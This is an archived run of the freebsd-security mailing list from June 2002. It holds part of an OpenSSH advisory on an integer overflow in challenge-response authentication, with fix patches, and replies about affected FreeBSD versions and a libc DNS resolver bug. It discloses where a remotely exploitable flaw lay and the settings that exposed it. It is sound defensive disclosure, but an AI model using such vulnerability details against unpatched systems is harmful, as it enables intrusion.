openssh-unix-announce-admin@mindrot.org X-BeenThere: openssh-unix-announce@mindrot.org X-Mailman-Version: 2.0.8 Precedence: bulk Reply-To: openssh@openssh.com List-Help: List-Post: List-Subscribe: , List-Id: Announcements of OpenSSH releases List-Unsubscribe: , List-Archive: Date: Wed, 26 Jun 2002 16:42:09 +0200 1. Versions affected: All versions of OpenSSH's sshd between 2.9.9 and 3.3 contain an input validation error that can result in an integer overflow and privilege escalation. OpenSSH 3.4 and later are not affected. OpenSSH 3.2 and later prevent privilege escalation if UsePrivilegeSeparation is enabled in sshd_config. OpenSSH 3.3 enables UsePrivilegeSeparation by default. Although OpenSSH 2.9 and earlier are not affected upgrading to OpenSSH 3.4 is recommended, because OpenSSH 3.4 adds checks for a class of potential bugs. 2. Impact: This bug can be exploited remotely if ChallengeResponseAuthentication is enabled in sshd_config. Affected are at least systems supporting s/key over SSH protocol version 2 (OpenBSD, FreeBSD and NetBSD as well as other systems supporting s/key with SSH). Exploitablitly of systems using PAM in combination has not been verified. 3. Short-Term Solution: Disable ChallengeResponseAuthentication in sshd_config. or Enable UsePrivilegeSeparation in sshd_config. 4. Solution: Upgrade to OpenSSH 3.4 or apply the following patches. 5. Credits: ISS. Appendix: A: Index: auth2-chall.c =================================================================== RCS file: /cvs/src/usr.bin/ssh/auth2-chall.c,v retrieving revision 1.18 diff -u -r1.18 auth2-chall.c --- auth2-chall.c 19 Jun 2002 00:27:55 -0000 1.18 +++ auth2-chall.c 26 Jun 2002 09:37:03 -0000 @@ -256,6 +256,8 @@ authctxt->postponed = 0; /* reset */ nresp = packet_get_int(); + if (nresp > 100) + fatal("input_userauth_info_response: nresp too big %u", nresp); if (nresp > 0) { response = xmalloc(nresp * sizeof(char*)); for (i = 0; i < nresp; i++) B: Index: auth2-pam.c =================================================================== RCS file: /var/cvs/openssh/auth2-pam.c,v retrieving revision 1.12 diff -u -r1.12 auth2-pam.c --- auth2-pam.c 22 Jan 2002 12:43:13 -0000 1.12 +++ auth2-pam.c 26 Jun 2002 10:12:31 -0000 @@ -140,6 +140,15 @@ nresp = packet_get_int(); /* Number of responses. */ debug("got %d responses", nresp); + + if (nresp != context_pam2.num_expected) + fatal("%s: Received incorrect number of responses " + "(expected %u, received %u)", __func__, nresp, + context_pam2.num_expected); + + if (nresp > 100) + fatal("%s: too many replies", __func__); + for (i = 0; i < nresp; i++) { int j = context_pam2.prompts[i]; _______________________________________________ openssh-unix-announce@mindrot.org mailing list http://www.mindrot.org/mailman/listinfo/openssh-unix-announce ----- End forwarded message ----- Lic. Fernando P. Schapachnik fschapachnik@vianetworks.com.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:27:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 126B637B72E for ; Wed, 26 Jun 2002 08:26:15 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 8AC5623; Wed, 26 Jun 2002 10:26:14 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5QFQEsE065912; Wed, 26 Jun 2002 10:26:14 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5QFQDR5065911; Wed, 26 Jun 2002 10:26:13 -0500 (CDT) Date: Wed, 26 Jun 2002 10:26:13 -0500 From: "Jacques A. Vidrine" To: Mike Tancsa Cc: Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH Advisory (was Re: Much ado about nothing.) Message-ID: <20020626152613.GD65700@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Mike Tancsa , Darren Reed , freebsd-security@FreeBSD.ORG References: <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 11:10:44AM -0400, Mike Tancsa wrote: > OK, but 2.9.9... is that really the same as FreeBSD's > > SSH-1.99-OpenSSH_2.9 FreeBSD localisations 20020307 No, 2.9.9 is vulnerable; FreeBSD's 2.9 is not. [snip] > This would imply there is a work around, but the talk before hand [snip] deraadt> Bullshit. I know. I think people reading this list already know my opinion on the issue. I'm just happy that it's all out in the open now. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:29:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from free.versiya.com (free.versiya.com [213.186.201.70]) by hub.freebsd.org (Postfix) with ESMTP id 2463337B8C2 for ; Wed, 26 Jun 2002 08:28:11 -0700 (PDT) Received: (from root@localhost) by free.versiya.com (8.11.6/8.11.3) id g5QFRFS24454 for freebsd-security@freebsd.org.KAV; Wed, 26 Jun 2002 18:27:15 +0300 (EEST) (envelope-from cerber@versiya.com) Received: from erebus (Dmitry.Nezhinsky [192.168.2.170]) by free.versiya.com (8.11.6/8.11.3) with ESMTP id g5QFREE24445 for ; Wed, 26 Jun 2002 18:27:15 +0300 (EEST) (envelope-from cerber@versiya.com) From: "Dmitry Nezhinsky" To: Subject: Who used tcp port 1262? Date: Wed, 26 Jun 2002 18:26:44 +0300 Message-ID: <8F153734A9B97C439F6E9F66F9324D883701@relay.versiya.com> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! Subj essentially -- Dmitry Nezhinsky e-mail: cerber@versiya.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:30: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id AEFE737B900 for ; Wed, 26 Jun 2002 08:28:34 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 3BF1423; Wed, 26 Jun 2002 10:28:34 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5QFSYsE065937; Wed, 26 Jun 2002 10:28:34 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5QFSXO6065936; Wed, 26 Jun 2002 10:28:33 -0500 (CDT) Date: Wed, 26 Jun 2002 10:28:32 -0500 From: "Jacques A. Vidrine" To: Konrad Heuer Cc: freebsd-security@freebsd.org Subject: Re: bsd libc dns resolving code vulnerable? Message-ID: <20020626152832.GE65700@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Konrad Heuer , freebsd-security@freebsd.org References: <20020626165034.Q35146-100000@gwdu60.gwdg.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626165034.Q35146-100000@gwdu60.gwdg.de> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 04:55:42PM +0200, Konrad Heuer wrote: > > Does already someone know about: > > http://www.pine.nl/advisories/pine-cert-20020601.txt > > Any comments? Fixed in -CURRENT, RELENG_4, and RELENG_4_6 early this morning. I believe Warner is fixing RELENG_4_5 at the moment. When that is done, an advisory will be published. In short: upgrade. Be sure to recompile any statically linked applications that use DNS. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:30:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from cithaeron.argolis.org (pool-138-88-127-183.res.east.verizon.net [138.88.127.183]) by hub.freebsd.org (Postfix) with ESMTP id 5795737B7CD for ; Wed, 26 Jun 2002 08:28:59 -0700 (PDT) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.3/8.12.3) with ESMTP id g5QFSlIK021766; Wed, 26 Jun 2002 11:28:47 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.3/8.12.3/Submit) with ESMTP id g5QFSlDC021763; Wed, 26 Jun 2002 11:28:47 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Wed, 26 Jun 2002 11:28:47 -0400 (EDT) From: Matt Piechota To: Albert Martinez Cc: freebsd-security@FreeBSD.ORG Subject: RE: Viruses attaahce to emails in this mailing list In-Reply-To: Message-ID: <20020626112400.F7517-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Albert Martinez wrote: > Hmm, interesting, virus delivery via attachments on a security list. What > reason is there for this list to allow attachments? Why wouldn't somebody > protect themselves from these virii? This one rolls around just about everytime a virus does come along. The reason for attachments is every so often people will post up a patch or a log file as an attachment. This was regarded as "A good thing". I do protect myself from the attachments, I use a UNIX mail reader that doesn't try to give me a great email experience. The more indepth answers for this debate are in the archives. -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:32:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 2EE1737B9E9 for ; Wed, 26 Jun 2002 08:31:07 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id B6B8623; Wed, 26 Jun 2002 10:31:06 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5QFV6sE065967; Wed, 26 Jun 2002 10:31:06 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5QFV3nW065966; Wed, 26 Jun 2002 10:31:03 -0500 (CDT) Date: Wed, 26 Jun 2002 10:31:03 -0500 From: "Jacques A. Vidrine" To: Pete Fritchman Cc: peter.lai@uconn.edu, freebsd-security@freebsd.org Subject: Re: Re Apache 1.3.26 package availability Message-ID: <20020626153103.GF65700@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Pete Fritchman , peter.lai@uconn.edu, freebsd-security@freebsd.org References: <20020626111640.A96913@cowbert.2y.net> <20020626112018.B76010@absolutbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626112018.B76010@absolutbsd.org> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 11:20:18AM -0400, Pete Fritchman wrote: > ``make package''. This also begs the question: when is a new package > going to make it to the FTP mirrors? It would be nice if there was a > way for security-officer@ to manually push newly updated packages fixing > security problems to the ftp servers so we don't lag behind... Yes, we are trying to work something out with portmgr@, but I think they are swamped at the moment. It's not been a big issue in the past (although a few have complained), as it usually took no more than a day or two for updates to appear. I am unsure of the reason for the slowdown. We'll get it resovled. You can actually find packages at: http://bento.freebsd.org/errorlogs/packages-4-full/ Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:42:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from bunning.skiltech.com (bunning.skiltech.com [216.235.79.240]) by hub.freebsd.org (Postfix) with ESMTP id 6F49D37B977 for ; Wed, 26 Jun 2002 08:38:23 -0700 (PDT) Received: (from root@localhost) by bunning.skiltech.com (8.11.6/8.11.6) id g5QFcMJ03965; Wed, 26 Jun 2002 11:38:22 -0400 (EDT) (envelope-from minter) Received: (from minter@localhost) by bunning.skiltech.com (8.11.6/8.11.6) id g5QFcFZ03950; Wed, 26 Jun 2002 11:38:15 -0400 (EDT) (envelope-from minter) Date: Wed, 26 Jun 2002 11:38:15 -0400 (EDT) From: "H. Wade Minter" X-X-Sender: minter@bunning.skiltech.com To: Benjamin Krueger Cc: freebsd-security@freebsd.org Subject: Re: Much ado about nothing. In-Reply-To: <20020626072326.A4270@mail.seattleFenix.net> Message-ID: <20020626113517.N3133-100000@bunning.skiltech.com> X-Folkin-Excellent: Eddie From Ohio (efohio.com) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Benjamin Krueger wrote: > > http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 Lemme see if I have this right. We were all whipped into a "Must Upgrade NOW!!!!" frenzy over this OpenSSH hole. It was so severe that it had to be kept in utmost secrecy, and the S.O.P. seemed to be "If you can't or won't upgrade, then turn off SSH,"... ...and the solution is to disable S/KEY??? That's it? --Wade -- 'I say to you that the VCR is to the American film producer and the American public as the Boston strangler is to the woman home alone.' Jack Valenti on VCRs, 1982 'It's getting clear -- alarmingly clear, I might add -- that we are in the midst of the possibility of Armageddon.' Jack Valenti on the Internet, 2002 http://www.digitalconsumer.org/ http://digitalspeech.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:42:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id B05D337BA18 for ; Wed, 26 Jun 2002 08:40:26 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5QFdcw6099621; Wed, 26 Jun 2002 11:39:38 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 26 Jun 2002 11:39:37 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Benjamin Krueger Cc: freebsd-security@FreeBSD.ORG Subject: Re: Much ado about nothing. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org FWIW, this does not in any way change our current strategy of getting -STABLE forward onto the most recent version of OpenSSH and getting privilege separation shipped for -STABLE. On the other hand, we're clearly happy that the shipped version is not vulnerable to this particular vulnerability. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories On Wed, 26 Jun 2002, Robert Watson wrote: > Yeah, I believe the version of OpenSSH shipped in -STABLE and past > releases is not vulnerable, but we'll need to sit down and check > carefully. People running -CURRENT (what few there are) should slide > their trees forward, however. > > Robert N M Watson FreeBSD Core Team, TrustedBSD Projects > robert@fledge.watson.org Network Associates Laboratories > > On Wed, 26 Jun 2002, Benjamin Krueger wrote: > > > > > http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 > > > > Regards, > > > > -- > > Benjamin Krueger > > > > "Life is far too important a thing ever to talk seriously about." > > - Oscar Wilde (1854 - 1900) > > ---------------------------------------------------------------- > > Send mail w/ subject 'send public key' or query for (0x251A4B18) > > Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18 > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:43:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from math.teaser.net (math.teaser.net [213.91.2.4]) by hub.freebsd.org (Postfix) with ESMTP id 8D9F137B9EF for ; Wed, 26 Jun 2002 08:39:56 -0700 (PDT) Received: from roadrunner.rominet.net (ATuileries-109-1-2-231.abo.wanadoo.fr [80.13.122.231]) by math.teaser.net (Postfix) with ESMTP id AE3A26C828 for ; Wed, 26 Jun 2002 17:39:55 +0200 (CEST) Received: by roadrunner.rominet.net (Postfix, from userid 1000) id D2017814A; Wed, 26 Jun 2002 17:39:54 +0200 (CEST) Date: Wed, 26 Jun 2002 17:39:54 +0200 From: Alain Thivillon To: freebsd-security@freebsd.org Subject: Re: bsd libc dns resolving code vulnerable? Message-ID: <20020626153954.GL9492@roadrunner.rominet.net> References: <20020626165034.Q35146-100000@gwdu60.gwdg.de> <20020626152832.GE65700@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626152832.GE65700@madman.nectar.cc> User-Agent: Mutt/1.3.24i X-Organization: Rominet Networks Inc. X-Operating-System: FreeBSD 4.6-RC Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > http://www.pine.nl/advisories/pine-cert-20020601.txt > > > > Any comments? > > Fixed in -CURRENT, RELENG_4, and RELENG_4_6 early this morning. I > believe Warner is fixing RELENG_4_5 at the moment. When that is done, > an advisory will be published. > > In short: upgrade. Be sure to recompile any statically linked > applications that use DNS. Do you know if using a local caching name server will prevent exploitation ? In short, does for example bind filters the responses leading to an overflow ? In this case, i will classify this to non-critical bug, because if someone has root access to your nameserver, you are in trouble, even without overflow in libc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:51: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from post.kis.ru (post.kis.ru [195.98.32.206]) by hub.freebsd.org (Postfix) with ESMTP id 06DA737B9D4; Wed, 26 Jun 2002 08:49:52 -0700 (PDT) Received: from xkis.kis.ru ([195.98.32.200] verified) by post.kis.ru (CommuniGate Pro SMTP 3.5.9) with SMTP id 499920; Wed, 26 Jun 2002 19:49:50 +0400 Date: Wed, 26 Jun 2002 19:49:50 +0400 (MSD) From: Dmitry Valdov X-Sender: dv@xkis.kis.ru To: "Jacques A. Vidrine" Cc: freebsd-security@FreeBSD.ORG Subject: Re: bsd libc dns resolving code vulnerable? In-Reply-To: <20020626152832.GE65700@madman.nectar.cc> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! Is 3.x vulnerable too? -- Dmitry Valdov mailto:dv@dv.ru CCNP On Wed, 26 Jun 2002, Jacques A. Vidrine wrote: > Date: Wed, 26 Jun 2002 10:28:32 -0500 > From: "Jacques A. Vidrine" > To: Konrad Heuer > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: bsd libc dns resolving code vulnerable? > > On Wed, Jun 26, 2002 at 04:55:42PM +0200, Konrad Heuer wrote: > > > > Does already someone know about: > > > > http://www.pine.nl/advisories/pine-cert-20020601.txt > > > > Any comments? > > Fixed in -CURRENT, RELENG_4, and RELENG_4_6 early this morning. I > believe Warner is fixing RELENG_4_5 at the moment. When that is done, > an advisory will be published. > > In short: upgrade. Be sure to recompile any statically linked > applications that use DNS. > > Cheers, > -- > Jacques A. Vidrine http://www.nectar.cc/ > NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos > jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:53:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 3221A37B406 for ; Wed, 26 Jun 2002 08:53:04 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 80F7423; Wed, 26 Jun 2002 10:53:03 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5QFr3sE066161; Wed, 26 Jun 2002 10:53:03 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5QFr2PY066160; Wed, 26 Jun 2002 10:53:02 -0500 (CDT) Date: Wed, 26 Jun 2002 10:53:02 -0500 From: "Jacques A. Vidrine" To: Dmitry Valdov Cc: freebsd-security@FreeBSD.ORG Subject: Re: bsd libc dns resolving code vulnerable? Message-ID: <20020626155302.GA66147@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Dmitry Valdov , freebsd-security@FreeBSD.ORG References: <20020626152832.GE65700@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 07:49:50PM +0400, Dmitry Valdov wrote: > Hi! > > Is 3.x vulnerable too? Yes. The fixes will be very similar in 3.x, but due to differences pre-KAME, it will require a little work. Are you willing to test patches? Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9: 7:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 577C037B400 for ; Wed, 26 Jun 2002 09:07:08 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id D131D23; Wed, 26 Jun 2002 11:07:07 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5QG77sE072941; Wed, 26 Jun 2002 11:07:07 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5QG76r9072940; Wed, 26 Jun 2002 11:07:06 -0500 (CDT) Date: Wed, 26 Jun 2002 11:07:06 -0500 From: "Jacques A. Vidrine" To: Alain Thivillon Cc: freebsd-security@freebsd.org Subject: Re: bsd libc dns resolving code vulnerable? Message-ID: <20020626160706.GC72438@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Alain Thivillon , freebsd-security@freebsd.org References: <20020626165034.Q35146-100000@gwdu60.gwdg.de> <20020626152832.GE65700@madman.nectar.cc> <20020626153954.GL9492@roadrunner.rominet.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626153954.GL9492@roadrunner.rominet.net> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 05:39:54PM +0200, Alain Thivillon wrote: To be clear, we're not certain that it /is/ exploitable. However, the only safe thing to do is assume that it is. > Do you know if using a local caching name server will prevent > exploitation ? I'm afraid I don't know. It depends upon whether the name server rejects or cleans responses. And it would have to be local, as in localhost. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9: 8:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from anchor-post-30.mail.demon.net (anchor-post-30.mail.demon.net [194.217.242.88]) by hub.freebsd.org (Postfix) with ESMTP id F010D37B401 for ; Wed, 26 Jun 2002 09:08:22 -0700 (PDT) Received: from caomhin.demon.co.uk ([62.49.21.186]) by anchor-post-30.mail.demon.net with esmtp (Exim 3.35 #1) id 17NFLB-000JKD-0U; Wed, 26 Jun 2002 17:08:22 +0100 Message-ID: Date: Wed, 26 Jun 2002 17:07:55 +0100 To: "H. Wade Minter" Cc: freebsd-security@freebsd.org From: Kevin Golding Subject: Re: Much ado about nothing. References: <20020626072326.A4270@mail.seattleFenix.net> <20020626113517.N3133-100000@bunning.skiltech.com> In-Reply-To: <20020626113517.N3133-100000@bunning.skiltech.com> MIME-Version: 1.0 X-Mailer: Turnpike Integrated Version 5.01 U Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Someone, quite probably H. Wade Minter, once wrote: >On Wed, 26 Jun 2002, Benjamin Krueger wrote: > >> >> http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 > > >Lemme see if I have this right. > >We were all whipped into a "Must Upgrade NOW!!!!" frenzy over this OpenSSH >hole. It was so severe that it had to be kept in utmost secrecy, and the >S.O.P. seemed to be "If you can't or won't upgrade, then turn off SSH,"... > >...and the solution is to disable S/KEY??? That's it? Not even that :-) Jacques has confirmed that the 2.9 which most people are (were?) running wasn't even vulnerable anyway. Kevin -- kevin@caomhin.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:13:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id B694137B401 for ; Wed, 26 Jun 2002 09:13:34 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5QGDWw6004214; Wed, 26 Jun 2002 12:13:32 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 26 Jun 2002 12:13:32 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: "H. Wade Minter" Cc: Benjamin Krueger , freebsd-security@freebsd.org Subject: Re: Much ado about nothing. In-Reply-To: <20020626113517.N3133-100000@bunning.skiltech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, H. Wade Minter wrote: > On Wed, 26 Jun 2002, Benjamin Krueger wrote: > > > http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 > > Lemme see if I have this right. > > We were all whipped into a "Must Upgrade NOW!!!!" frenzy over this > OpenSSH hole. It was so severe that it had to be kept in utmost > secrecy, and the S.O.P. seemed to be "If you can't or won't upgrade, > then turn off SSH,"... > > ...and the solution is to disable S/KEY??? That's it? Well, I think there's more to it 